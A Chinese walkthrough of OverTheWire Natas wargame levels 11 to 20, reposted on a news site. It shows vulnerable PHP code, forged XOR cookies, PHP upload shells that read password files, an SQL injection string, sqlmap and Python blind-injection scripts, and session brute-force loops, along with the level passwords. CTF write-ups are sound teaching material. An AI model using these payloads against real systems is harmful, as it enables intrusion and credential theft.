微博 QQ RSS订阅 微信
首页 热点 正文

Natas通关指南(11-20)

2023-02-20 合天网安实验室

原创: Lof_x 合天智汇

接上一篇Natas通关指南(1-10) 继续闯关

OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一关的密码。每一关都有一个网站,类似 http://natasX.natas.labs.overthewire.org,其中X是每一关的编号。每一关都要输入用户名(例如,level0的用户名是natas0)及其密码才能访问。所有密码存储在 /etc/natas_webpass/中。例如natas1的密码存储在文件 /etc/natas_webpass/natas1中,只能由natas0natas1读取。

网站:

http://overthewire.org/wargames/natas/

Tips:所用工具:Chrome浏览器;Curl;BurpSuite;SQLMap

Level 11-12

Username: natas11

Password: natas11

URL: http://natas11.natas.labs.overthewire.org

首先使用我们之前得到的密码: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK登录natas11,得到一句提示:

  1. Cookies are protected with XOR encryption

还有一个可以设置背景颜色的输入框,输入16进制的色值,即可设置网页背景颜色,同样可以通过点击 Viewsourcecode查看源码。关键代码如下:

  1. $defaultdata = array(
  2. "showpassword"
  3. =>
  4. "no"
  5. ,
  6. "bgcolor"
  7. =>
  8. "#ffffff"
  9. );
  10. function
  11. xor_encrypt($in) {
  12. $key =
  13. '<censored>'
  14. ;
  15. $text = $in;
  16. $outText =
  17. ''
  18. ;
  20. // Iterate through each character
  22. for
  23. ($i=
  24. 0
  25. ;$i<strlen($text);$i++) {
  26. $outText .= $text[$i] ^ $key[$i % strlen($key)];
  27. }
  29. return
  30. $outText;
  31. }
  32. function
  33. loadData($def) {
  35. global
  36. $_COOKIE;
  37. $mydata = $def;
  39. if
  40. (array_key_exists(
  41. "data"
  42. , $_COOKIE)) {
  43. $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[
  44. "data"
  45. ])),
  46. true
  47. );
  49. if
  50. (is_array($tempdata) && array_key_exists(
  51. "showpassword"
  52. , $tempdata) && array_key_exists(
  53. "bgcolor"
  54. , $tempdata)) {
  56. if
  57. (preg_match(
  58. '/^#(?:[a-f\d]{6})$/i'
  59. , $tempdata[
  60. 'bgcolor'
  61. ])) {
  62. $mydata[
  63. 'showpassword'
  64. ] = $tempdata[
  65. 'showpassword'
  66. ];
  67. $mydata[
  68. 'bgcolor'
  69. ] = $tempdata[
  70. 'bgcolor'
  71. ];
  72. }
  73. }
  74. }
  76. return
  77. $mydata;
  78. }
  79. function
  80. saveData($d) {
  81. setcookie(
  82. "data"
  83. , base64_encode(xor_encrypt(json_encode($d))));
  84. }
  85. $data = loadData($defaultdata);
  86. if
  87. (array_key_exists(
  88. "bgcolor"
  89. ,$_REQUEST)) {
  91. if
  92. (preg_match(
  93. '/^#(?:[a-f\d]{6})$/i'
  94. , $_REQUEST[
  95. 'bgcolor'
  96. ])) {
  97. $data[
  98. 'bgcolor'
  99. ] = $_REQUEST[
  100. 'bgcolor'
  101. ];
  102. }
  103. }
  104. saveData($data);
  105. ?>
  106. <h1>
  107. natas11</h1>
  108. <div id=
  109. "content"
  110. >
  111. <body style=
  112. "background: <?=$data['bgcolor']?>;"
  113. >
  114. Cookies
  115. are
  116. protected
  118. with
  119. XOR encryption<br/><br/>
  120. <?
  121. if
  122. ($data[
  123. "showpassword"
  124. ] ==
  125. "yes"
  126. ) {
  128. print
  130. "The password for natas12 is <censored><br>"
  131. ;
  132. }
  133. ?>

从代码可以看出,通过一些列的编码,包括 base64加密, php异或运算。把用户输入的数据编码进 cookie里面。通过浏览器可以查看到data这个值是: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw。而 showpassword这个参数决定了我们是否能看到下一关密码。代码中有个 censored的 key,这个是 php用来做异或运算加密用到的 key,我们需要先算出这 key值,然后用这个值作为 key进行运算和一些列编码,计算出新的 cookie传入,即可得到下一关的密码。

key值计算:

  1. <?php
  2. $orig_cookie = base64_decode(
  3. 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw'
  4. );
  6. function
  7. xor_encrypt($in) {
  8. $text = $in;
  9. $key = json_encode(array(
  10. "showpassword"
  11. =>
  12. "no"
  13. ,
  14. "bgcolor"
  15. =>
  16. "#ffffff"
  17. ));
  18. $out =
  19. ''
  20. ;
  22. for
  23. ($i=
  24. 0
  25. ;$i<strlen($text);$i++) {
  26. $out .= $text[$i] ^ $key[$i % strlen($key)];
  27. }
  29. return
  30. $out;
  31. }
  32. echo xor_encrypt($orig_cookie);
  33. ?>

得到的结果是 qw8J

计算新的Cookie:

  1. <?php
  2. $defaultdata = array(
  3. "showpassword"
  4. =>
  5. "yes"
  6. ,
  7. "bgcolor"
  8. =>
  9. "#ffffff"
  10. );
  11. function
  12. xor_encrypt($in) {
  13. $key =
  14. 'qw8J'
  15. ;
  16. $text = $in;
  17. $out =
  18. ''
  19. ;
  21. // Iterate through each character
  23. for
  24. ($i=
  25. 0
  26. ;$i<strlen($text);$i++) {
  27. $out .= $text[$i] ^ $key[$i % strlen($key)];
  28. }
  30. return
  31. $out;
  32. }
  33. function
  34. loadData($def) {
  35. $mydata = $def;
  36. $tempdata = json_decode(xor_encrypt(base64_decode($data)),
  37. true
  38. );
  40. return
  41. $mydata;
  42. }
  43. echo base64_encode(xor_encrypt(json_encode(loadData($defaultdata))))
  44. ?>

结果是: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK,传入新的Cookie:

  1. curl -isu natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK natas11.natas.labs.overthewire.org --cookie
  2. "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK"
  3. HTTP/
  4. 1.1
  6. 200
  7. OK
  8. Date
  9. :
  10. Mon
  11. ,
  12. 27
  14. Aug
  16. 2018
  18. 13
  19. :
  20. 40
  21. :
  22. 47
  23. GMT
  24. Server
  25. :
  26. Apache
  27. /
  28. 2.4
  29. .
  30. 10
  31. (
  32. Debian
  33. )
  34. Set
  35. -
  36. Cookie
  37. : data=
  38. ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
  39. ......
  40. Cookies
  41. are
  42. protected
  44. with
  45. XOR encryption<br/><br/>
  46. The
  47. password
  48. for
  49. natas12
  50. is
  52. EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
  53. <br>
  54. ......

得到密码。

Level 12-13

Username: natas12

URL: http://natas12.natas.labs.overthewire.org

登录natas12,可以看到是一个上传文件功能:

  1. Choose a JPEG to upload (max 1KB):

提示可以上传图片,最大不超过1kB,点击 Viewsourcecode查看源码,关键代码如下:

  1. <?
  2. function
  3. genRandomString() {
  4. $length =
  5. 10
  6. ;
  7. $characters =
  8. "0123456789abcdefghijklmnopqrstuvwxyz"
  9. ;
  10. $string =
  11. ""
  12. ;
  14. for
  15. ($p =
  16. 0
  17. ; $p < $length; $p++) {
  18. $string .= $characters[mt_rand(
  19. 0
  20. , strlen($characters)-
  21. 1
  22. )];
  23. }
  25. return
  26. $string;
  27. }
  28. function
  29. makeRandomPath($dir, $ext) {
  31. do
  32. {
  33. $path = $dir.
  34. "/"
  35. .genRandomString().
  36. "."
  37. .$ext;
  38. }
  39. while
  40. (file_exists($path));
  42. return
  43. $path;
  44. }
  45. function
  46. makeRandomPathFromFilename($dir, $fn) {
  47. $ext = pathinfo($fn, PATHINFO_EXTENSION);
  49. return
  50. makeRandomPath($dir, $ext);
  51. }
  52. if
  53. (array_key_exists(
  54. "filename"
  55. , $_POST)) {
  56. $target_path = makeRandomPathFromFilename(
  57. "upload"
  58. , $_POST[
  59. "filename"
  60. ]);
  62. if
  63. (filesize($_FILES[
  64. 'uploadedfile'
  65. ][
  66. 'tmp_name'
  67. ]) >
  68. 1000
  69. ) {
  70. echo
  71. "File is too big"
  72. ;
  73. }
  74. else
  75. {
  77. if
  78. (move_uploaded_file($_FILES[
  79. 'uploadedfile'
  80. ][
  81. 'tmp_name'
  82. ], $target_path)) {
  83. echo
  84. "The file <a href=\"$target_path\">$target_path</a> has been uploaded"
  85. ;
  86. }
  87. else
  88. {
  89. echo
  90. "There was an error uploading the file, please try again!"
  91. ;
  92. }
  93. }
  94. }
  95. else
  96. {
  97. ?>
  98. <form
  100. enctype
  101. =
  102. "multipart/form-data"
  104. action
  105. =
  106. "index.php"
  108. method
  109. =
  110. "POST"
  111. >
  113. <input
  115. type
  116. =
  117. "hidden"
  119. name
  120. =
  121. "MAX_FILE_SIZE"
  123. value
  124. =
  125. "1000"
  127. />
  129. <input type="hidden" name="filename" value="<?
  130. print
  131. genRandomString(); ?>.jpg" />
  132. Choose a JPEG to upload (max 1KB):
  133. <br/>
  135. <input
  137. name
  138. =
  139. "uploadedfile"
  141. type
  142. =
  143. "file"
  145. /><br
  147. />
  149. <input
  151. type
  152. =
  153. "submit"
  155. value
  156. =
  157. "Upload File"
  159. />

通过阅读代码,可以发现除了**文件大小和文件扩展名做了前端**之外,并没有检测文件类型。而且还会返回上传后的路径,那我们直接上传一个 php文件去读取 natas13的密码即可。你可以通过 BurpSuite之类的工具修改上传的 filename后缀即可。

  1. ///getpass.php
  2. <?php
  3. $getpass = file_get_contents(
  4. '/etc/natas_webpass/natas13'
  5. );
  6. echo $getpass;
  7. ?>

得到密码: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13-14

Username: natas13

URL: http://natas13.natas.labs.overthewire.org

页面和前一关一样,不过查看源代码发现这一次**了文件类型,通过 php的函数 exif_imagetype() 来验证文件类型,通过查看php的文档,这个函数通过检查文件的签名(第一个字节),从而检测文件类型。关键代码如下:

  1. }
  2. else
  4. if
  5. (! exif_imagetype($_FILES[
  6. 'uploadedfile'
  7. ][
  8. 'tmp_name'
  9. ])) {
  10. echo
  11. "File is not an image"
  12. ;
  13. }
  14. else
  15. {
  17. if
  18. (move_uploaded_file($_FILES[
  19. 'uploadedfile'
  20. ][
  21. 'tmp_name'
  22. ], $target_path)) {
  23. echo
  24. "The file <a href=\"$target_path\">$target_path</a> has been uploaded"
  25. ;
  26. }
  27. else
  28. {
  29. echo
  30. "There was an error uploading the file, please try again!"
  31. ;
  32. }
  33. }
  34. }
  35. else
  36. {

那我们只需在上传的 php文件中加入任意图片格式文件头标识即可,比如 GIF98a

  1. GIF89a
  2. <?php
  3. $getpass = file_get_contents(
  4. '/etc/natas_webpass/natas14'
  5. );
  6. echo $getpass;
  7. ?>

上传后访问返回的路径,得到密码: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 14-15

Username: natas14

URL: http://natas14.natas.labs.overthewire.org

访问后,是一个登录页面,需要输入 username和 password,查看代码,关键代码:

  1. <?
  2. if
  3. (array_key_exists(
  4. "username"
  5. , $_REQUEST)) {
  6. $link = mysql_connect(
  7. 'localhost'
  8. ,
  9. 'natas14'
  10. ,
  11. '<censored>'
  12. );
  13. mysql_select_db(
  14. 'natas14'
  15. , $link);
  16. $query =
  17. "SELECT * from users where username=\""
  18. .$_REQUEST[
  19. "username"
  20. ].
  21. "\" and password=\""
  22. .$_REQUEST[
  23. "password"
  24. ].
  25. "\""
  26. ;
  28. if
  29. (array_key_exists(
  30. "debug"
  31. , $_GET)) {
  32. echo
  33. "Executing query: $query<br>"
  34. ;
  35. }
  37. if
  38. (mysql_num_rows(mysql_query($query, $link)) >
  39. 0
  40. ) {
  41. echo
  42. "Successful login! The password for natas15 is <censored><br>"
  43. ;
  44. }
  45. else
  46. {
  47. echo
  48. "Access denied!<br>"
  49. ;
  50. }
  51. mysql_close($link);
  52. }
  53. else
  54. {
  55. ?>

很明显的 SQL注入漏洞,没有任何过滤,直接试试万能密码: " OR 1=1 #

注入成功,得到密码: Successfullogin!Thepasswordfornatas15isAwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 15-16

Username: natas15

URL: http://natas15.natas.labs.overthewire.org

页面需要输入一个 username,可以点击 Checkexistence查询用户是否存在,关键代码如下:

  1. <h1>
  2. natas15
  3. </h1>
  5. <div
  7. id
  8. =
  9. "content"
  10. >
  12. <?
  13. /*
  14. CREATE TABLE `users` (
  15. `username` varchar(64) DEFAULT NULL,
  16. `password` varchar(64) DEFAULT NULL
  17. );
  18. */
  20. if
  21. (array_key_exists(
  22. "username"
  23. , $_REQUEST)) {
  24. $link = mysql_connect(
  25. 'localhost'
  26. ,
  27. 'natas15'
  28. ,
  29. '<censored>'
  30. );
  31. mysql_select_db(
  32. 'natas15'
  33. , $link);
  34. $query =
  35. "SELECT * from users where username=\""
  36. .$_REQUEST[
  37. "username"
  38. ].
  39. "\""
  40. ;
  42. if
  43. (array_key_exists(
  44. "debug"
  45. , $_GET)) {
  46. echo
  47. "Executing query: $query<br>"
  48. ;
  49. }
  50. $res = mysql_query($query, $link);
  52. if
  53. ($res) {
  55. if
  56. (mysql_num_rows($res) >
  57. 0
  58. ) {
  59. echo
  60. "This user exists.<br>"
  61. ;
  62. }
  63. else
  64. {
  65. echo
  66. "This user doesn't exist.<br>"
  67. ;
  68. }
  69. }
  70. else
  71. {
  72. echo
  73. "Error in query.<br>"
  74. ;
  75. }
  76. mysql_close($link);
  77. }
  78. else
  79. {
  80. ?>

这一关,页面不会返回SQL结果。但可以通过错误提示判断查询的结果,所以可以使用SQL盲注,可以使用 LIKE表达式用通配符按个判断。这里我们直接用 sqlmap好了。

  1. sqlmap -u http:
  2. //natas15.natas.labs.overthewire.org/index.php --auth-type=basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --dbms=mysql --data username=natas16 --level=5 --risk=3 --technique=B --dump --string="This user exists"

或者写python脚本获取密码,得到密码 WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Level 16-17

Username: natas16

URL: http://natas16.natas.labs.overthewire.org

这一关和第9关,第10关很像,不过过滤了更多的字符

页面提示 Forsecurity reasons,we now filter even more on certain characters,页面功能是 Findwords containing:,需要输入一些内容,然后搜索,然后会输出一些内容。关键代码如下:

  1. $key =
  2. ""
  3. ;
  4. if
  5. (array_key_exists(
  6. "needle"
  7. , $_REQUEST)) {
  8. $key = $_REQUEST[
  9. "needle"
  10. ];
  11. }
  12. if
  13. ($key !=
  14. ""
  15. ) {
  17. if
  18. (preg_match(
  19. '/[;|&`\'"]/'
  20. ,$key)) {
  22. print
  24. "Input contains an illegal character!"
  25. ;
  26. }
  27. else
  28. {
  29. passthru(
  30. "grep -i \"$key\" dictionary.txt"
  31. );
  32. }
  33. }
  34. ?>

虽然过滤了很多字符,但是没有过滤 $和 ()。我们知道PHP里的 $()即使在引号内也可以使用,所以我们可以构造注入语言 $(grep a/etc/natas_webpass/natas17),执行的语句是这样的: passthru("grep -i \"$(grep a /etc/natas_webpass/natas17)\" dictionary.txt");所有的单词都被返回了。 我们知道 dictionary.txt中存在字符串,比如说 A,用它与 $(grep)的返回值相加,如果内层返回了结果将检索出空值,如果返回空值则外层的 grep会返回结果 。

比如说:如 password中首字母为 a,构成

grep-I"$(grep ^a /etc/natas_webpass/natas17)A"dictionary.txt由于内部的 $()命令返回了 a,则使外层命令变为

grep-I"aA"dictionary.txt由于 dictionary中没有 aA,从而返回空值

而如果内层 $()命令返回空值,外层则能正确检索到 A,于是返回值,证明首字母不是 a

按照这个原理可以构造出**脚本

  1. import
  2. requests
  3. chars =
  4. '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
  5. exist =
  6. ''
  7. password =
  8. ''
  9. target =
  10. 'http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh*@natas16.natas.labs.overthewire.org/'
  11. trueStr =
  12. 'Output:\n<pre>\n</pre>'
  13. for
  14. x
  15. in
  16. chars:
  17. r = requests.get(target+
  18. '?needle=$(grep '
  19. +x+
  20. ' /etc/natas_webpass/natas17)Getpass'
  21. )
  23. if
  24. r.content.find(trueStr) != -
  25. 1
  26. :
  27. exist += x
  29. print
  31. 'Using: '
  32. + exist
  33. for
  34. i
  35. in
  36. range(
  37. 32
  38. ):
  40. for
  41. c
  42. in
  43. exist:
  44. r = requests.get(target+
  45. '?needle=$(grep ^'
  46. +password+c+
  47. ' /etc/natas_webpass/natas17)Getpass'
  48. )
  50. if
  51. r.content.find(trueStr) != -
  52. 1
  53. :
  54. password += c
  56. print
  58. 'Password: '
  59. + password +
  60. '*'
  61. * int(
  62. 32
  63. - len(password))
  65. break

得到密码是: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Level 17-18

Username: natas17

URL: http://natas17.natas.labs.overthewire.org

同 natas15,不过没有错误提示,所以可以用基于时间的盲注。

得出的密码是 xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

Level 18-19

Username: natas18

URL: http://natas18.natas.labs.overthewire.org

提示: Pleaseloginwithyour admin account to retrieve credentialsfornatas19.

同样有一个登录框,可以输入 username和 password。关键代码如下:

  1. $maxid =
  2. 640
  3. ;
  4. // 640 should be enough for everyone
  5. function
  6. isValidAdminLogin() {
  7. /* {{{ */
  10. if
  11. ($_REQUEST[
  12. "username"
  13. ] ==
  14. "admin"
  15. ) {
  17. /* This method of authentication appears to be unsafe and has been disabled for now. */
  20. //return 1;
  21. }
  23. return
  25. 0
  26. ;
  27. }
  28. /* }}} */
  30. function
  31. isValidID($id) {
  32. /* {{{ */
  35. return
  36. is_numeric($id);
  37. }
  38. /* }}} */
  40. function
  41. createID($user) {
  42. /* {{{ */
  45. global
  46. $maxid;
  48. return
  49. rand(
  50. 1
  51. , $maxid);
  52. }
  53. /* }}} */
  55. function
  56. debug($msg) {
  57. /* {{{ */
  60. if
  61. (array_key_exists(
  62. "debug"
  63. , $_GET)) {
  65. print
  67. "DEBUG: $msg<br>"
  68. ;
  69. }
  70. }
  71. /* }}} */
  73. function
  74. my_session_start() {
  75. /* {{{ */
  78. if
  79. (array_key_exists(
  80. "PHPSESSID"
  81. , $_COOKIE)
  82. and
  83. isValidID($_COOKIE[
  84. "PHPSESSID"
  85. ])) {
  87. if
  88. (!session_start()) {
  89. debug(
  90. "Session start failed"
  91. );
  93. return
  95. false
  96. ;
  97. }
  98. else
  99. {
  100. debug(
  101. "Session start ok"
  102. );
  104. if
  105. (!array_key_exists(
  106. "admin"
  107. , $_SESSION)) {
  108. debug(
  109. "Session was old: admin flag set"
  110. );
  111. $_SESSION[
  112. "admin"
  113. ] =
  114. 0
  115. ;
  116. // backwards compatible, secure
  117. }
  119. return
  121. true
  122. ;
  123. }
  124. }
  126. return
  128. false
  129. ;
  130. }
  131. /* }}} */
  133. function
  134. print_credentials() {
  135. /* {{{ */
  138. if
  139. ($_SESSION
  140. and
  141. array_key_exists(
  142. "admin"
  143. , $_SESSION)
  144. and
  145. $_SESSION[
  146. "admin"
  147. ] ==
  148. 1
  149. ) {
  151. print
  153. "You are an admin. The credentials for the next level are:<br>"
  154. ;
  156. print
  158. "<pre>Username: natas19\n"
  159. ;
  161. print
  163. "Password: <censored></pre>"
  164. ;
  165. }
  166. else
  167. {
  169. print
  171. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."
  172. ;
  173. }
  174. }
  175. /* }}} */
  177. $showform =
  178. true
  179. ;
  180. if
  181. (my_session_start()) {
  182. print_credentials();
  183. $showform =
  184. false
  185. ;
  186. }
  187. else
  188. {
  190. if
  191. (array_key_exists(
  192. "username"
  193. , $_REQUEST) && array_key_exists(
  194. "password"
  195. , $_REQUEST)) {
  196. session_id(createID($_REQUEST[
  197. "username"
  198. ]));
  199. session_start();
  200. $_SESSION[
  201. "admin"
  202. ] = isValidAdminLogin();
  203. debug(
  204. "New session started"
  205. );
  206. $showform =
  207. false
  208. ;
  209. print_credentials();
  210. }
  211. }
  212. if
  213. ($showform) {
  214. ?>

从代码上来看,没有连接数据库,说明不是 sql注入,但是我们注意到有一个变量 maxid,在 createID函数中,接收用户名请求,并将其分配给 1到 640($maxid)之间的随机整数。然后它将其初始化为 session_id。假设 PHPSESSID是来自 session_id的赋值,意味有1个会话ID分配会分配给“admin”。通过浏览器请求,我们发现 PHPSESSID的值确实是来自变量 maxid产生的 session_id值。

所以我们只要穷举 maxid的值就好了。可以用 Burpsuite**这个值,然后把它作为 PHPSESSID发送请求,即可得到密码。密码为 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

如果嫌 Burpsuite太麻烦,用 shell脚本也可轻松搞定

  1. for
  2. i
  3. in
  5. `seq 640`
  7. do
  8. echo $i
  9. curl -isu natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP http:
  10. //natas18.natas.labs.overthewire.org/ --cookie "PHPSESSID=$i" | grep natas19
  11. done

Level 19-20

Username: natas19

URL: http://natas19.natas.labs.overthewire.org

提示是这样的: Thispage uses mostly the same codeasthe previous level,but sessionIDsarenolonger sequential...Pleaseloginwithyour admin account to retrieve credentialsfornatas20.意思就是和上一关一样,只不过 PHPSESSID不再那么简单容易猜到而已。

通过观察,发现其 PHPSESSID,虽然一长串字符串,如 3237362d61646d696e,通过16进制**发现,都是由 3位数字-admin组成的,也就是说后面的 2d61646d696e是不变的。所以我们只需要穷举 1-640之间的数字然后拼接 -admin做16进制转换,再带入 PHPSESSID中进行提交,就能找到那个属于 admin的 PHPSESSID。最后得到的密码是 eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

Level 20-21

Username: natas20

URL: http://natas20.natas.labs.overthewire.org

登录后,提示: Youare loggedinasa regular user.Loginasan admin to retrieve credentialsfornatas21. 你可以输入 Yourname,然后点 Changename,不过无论你输入什么页面都没有任何信息反馈给你。查看源码,关键代码如下:

  1. <?
  2. function
  3. debug($msg) {
  4. /* {{{ */
  7. if
  8. (array_key_exists(
  9. "debug"
  10. , $_GET)) {
  12. print
  14. "DEBUG: $msg<br>"
  15. ;
  16. }
  17. }
  18. /* }}} */
  20. function
  21. print_credentials() {
  22. /* {{{ */
  25. if
  26. ($_SESSION
  27. and
  28. array_key_exists(
  29. "admin"
  30. , $_SESSION)
  31. and
  32. $_SESSION[
  33. "admin"
  34. ] ==
  35. 1
  36. ) {
  38. print
  40. "You are an admin. The credentials for the next level are:<br>"
  41. ;
  43. print
  45. "<pre>Username: natas21\n"
  46. ;
  48. print
  50. "Password: <censored></pre>"
  51. ;
  52. }
  53. else
  54. {
  56. print
  58. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21."
  59. ;
  60. }
  61. }
  62. /* }}} */
  64. /* we don't need this */
  66. function
  67. myopen($path, $name) {
  69. //debug("MYOPEN $path $name");
  71. return
  73. true
  74. ;
  75. }
  76. /* we don't need this */
  78. function
  79. myclose() {
  81. //debug("MYCLOSE");
  83. return
  85. true
  86. ;
  87. }
  88. function
  89. myread($sid) {
  90. debug(
  91. "MYREAD $sid"
  92. );
  94. if
  95. (strspn($sid,
  96. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
  97. ) != strlen($sid)) {
  98. debug(
  99. "Invalid SID"
  100. );
  102. return
  104. ""
  105. ;
  106. }
  107. $filename = session_save_path() .
  108. "/"
  109. .
  110. "mysess_"
  111. . $sid;
  113. if
  114. (!file_exists($filename)) {
  115. debug(
  116. "Session file doesn't exist"
  117. );
  119. return
  121. ""
  122. ;
  123. }
  124. debug(
  125. "Reading from "
  126. . $filename);
  127. $data = file_get_contents($filename);
  128. $_SESSION = array();
  130. foreach
  131. (explode(
  132. "\n"
  133. , $data)
  134. as
  135. $line) {
  136. debug(
  137. "Read [$line]"
  138. );
  139. $parts = explode(
  140. " "
  141. , $line,
  142. 2
  143. );
  145. if
  146. ($parts[
  147. 0
  148. ] !=
  149. ""
  150. ) $_SESSION[$parts[
  151. 0
  152. ]] = $parts[
  153. 1
  154. ];
  155. }
  157. return
  158. session_encode();
  159. }
  160. function
  161. mywrite($sid, $data) {
  163. // $data contains the serialized version of $_SESSION
  165. // but our encoding is better
  166. debug(
  167. "MYWRITE $sid $data"
  168. );
  170. // make sure the sid is alnum only!!
  172. if
  173. (strspn($sid,
  174. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
  175. ) != strlen($sid)) {
  176. debug(
  177. "Invalid SID"
  178. );
  180. return
  181. ;
  182. }
  183. $filename = session_save_path() .
  184. "/"
  185. .
  186. "mysess_"
  187. . $sid;
  188. $data =
  189. ""
  190. ;
  191. debug(
  192. "Saving in "
  193. . $filename);
  194. ksort($_SESSION);
  196. foreach
  197. ($_SESSION
  198. as
  199. $key => $value) {
  200. debug(
  201. "$key => $value"
  202. );
  203. $data .=
  204. "$key $value\n"
  205. ;
  206. }
  207. file_put_contents($filename, $data);
  208. chmod($filename,
  209. 0600
  210. );
  211. }
  212. /* we don't need this */
  214. function
  215. mydestroy($sid) {
  217. //debug("MYDESTROY $sid");
  219. return
  221. true
  222. ;
  223. }
  224. /* we don't need this */
  226. function
  227. mygarbage($t) {
  229. //debug("MYGARBAGE $t");
  231. return
  233. true
  234. ;
  235. }
  236. session_set_save_handler(
  238. "myopen"
  239. ,
  241. "myclose"
  242. ,
  244. "myread"
  245. ,
  247. "mywrite"
  248. ,
  250. "mydestroy"
  251. ,
  253. "mygarbage"
  254. );
  255. session_start();
  256. if
  257. (array_key_exists(
  258. "name"
  259. , $_REQUEST)) {
  260. $_SESSION[
  261. "name"
  262. ] = $_REQUEST[
  263. "name"
  264. ];
  265. debug(
  266. "Name set to "
  267. . $_REQUEST[
  268. "name"
  269. ]);
  270. }
  271. print_credentials();
  272. $name =
  273. ""
  274. ;
  275. if
  276. (array_key_exists(
  277. "name"
  278. , $_SESSION)) {
  279. $name = $_SESSION[
  280. "name"
  281. ];
  282. }
  283. ?>

我们来看看每个函数的作用:

debug($msg)表示打开了调试信息,可以通过在URL的末尾添加 /index.php?debug来查看调试消息 $msg。

访问之后将看到一些提示,类似这样的:

  1. DEBUG: MYWRITE **2d78a9d3u7r6qq2dn8tl7sf1 name|s:5:"admin";
  2. DEBUG: Saving in /var/lib/php5/sessions//mysess_**2d78a9d3u7r6qq2dn8tl7sf1
  3. DEBUG: name => admin

可以看出,登录之后, $ _SESSION的值被存储在一个文件中。

重点在 mywrite和 myread这两个关键函数,它们的作用是管理会话状态。

默认情况下, $ _SESSION中唯一的 key是 name,其值通过 /index.php中的表单提交进行设置。我们可以通过对 name键值对进行注入:将 data里面的值变为: name xxxx \n admin1\n。

对换行符编码然后提交:

  1. http://natas20.natas.labs.overthewire.org/index.php?name=test%0Aadmin%201&debug=1

再次访问 http://natas20.natas.labs.overthewire.org即可得到密码

  1. You are an admin. The credentials for the next level are:
  2. Username: natas21
  3. Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ

未完待续......


相关股票:
相关概念: EDA ETC

001299美能能源估值分析及打新申购建议

一 公司基本情况速览总股本:1.879亿 总发行量 :4690万 发行**:10.69元 募资总额:5.01亿发行市盈率:20.42倍 行业市盈率:19.12倍所属行业:燃气生产和供应 所属区域:陕西

美能能源(001299)12月6日主力资金净买入1125.28万元

截至2022年12月6日收盘,美能能源(001299)报收于27.53元,上涨2.92%,换手率39.8%,成交量18.67万手,成交额5.05亿元。12月6日的资金流向数据方面,主力资金净流入112

美能能源11月8日主力资金净卖出3991.53万元

截至2022年11月8日收盘,美能能源(001299)报收于22.69元,上涨3.18%,换手率71.38%,成交量33.48万手,成交额7.75亿元。资金流向数据方面,11月8日主力资金净流出399

专访美能能源董事长晏立群:紧随绿色低碳能源**大潮 捕捉清洁能源发展新商机

90年代初,****前沿的深圳还处在草莽创业的时期,那时候,深圳吸引了一批又一批来自全国各地的年轻人,晏立群就是其中之一。从外出闯荡到回乡扎根,从推销液化气灶具到推广应用天然气,从“打工人”到创业者,

美能能源(001299)7月20日股东户数2万户,较上期减少6.82%

近日美能能源披露,截至2023年7月20日公司股东户数为2.0万户,较7月10日减少1465.0户,减幅为6.82%。户均持股数量由上期的8731.0股增加至9370.0股,户均持股市值为15.18万

美能能源股东户数下降13.59%,户均持股3.53万元

美能能源2023年3月22日在深交所互动易中披露,截至2023年3月20日公司股东户数为2.27万户,较上期(2023年2月10日)减少3573户,减幅为13.59%。美能能源股东户数低于行业平均水平

美能能源最新股东户数下降6.82% **趋向集中

美能能源7月24日在交易所互动平台中披露,截至7月20日公司股东户数为20020户,较上期(7月10日)减少1465户,环比降幅为6.82%。证券时报•数据宝统计,截至发稿,美能能源收盘价为16.20

天然气供应商美能能源上市首日涨停,三季报业绩增收不增利

记者 | 陈慧东编辑 | 10月31日上市首日,美能能源(001299.SZ)高开后一路上涨,两次触及涨停**,于10时01分许封上涨停板。截至收盘,该股股价上涨43.97%,报15.39元/股,成交

美能能源股东户数增加59户,户均持股3.64万元

美能能源2023年7月18日在深交所互动易中披露,截至2023年7月10日公司股东户数为2.15万户,较上期(2023年6月30日)增加59户,增幅为0.28%。美能能源股东户数低于行业平均水平。根据

多主力现身**榜,美能能源换手率达67.90%(11-24)

深交所2022年11月24日交易***息显示,美能能源因属于当日换手率达到20%的证券而登上**榜。美能能源当收22.57元,涨跌幅为-1.53%,换手率67.90%,振幅10.43%,成交额7.

多主力现身**榜,美能能源换手率达47.30%(11-23)

深交所2022年11月23日交易***息显示,美能能源因属于当日换手率达到20%的证券而登上**榜。美能能源当收22.92元,涨跌幅为9.98%,换手率47.30%,振幅12.57%,成交额4.9

11月30日美能能源(001299)**榜数据:机构净买入6.49万元

沪深交易所2022年11月30日公布的交易***息显示,美能能源(001299)因日换手率达到20%的前5只证券登上**榜。此次是近5个交易日内第5次上榜。截至2022年11月30日收盘,美能能源(0

美能能源将开启申购:上半年增收不增利,预计上市时市值20亿元

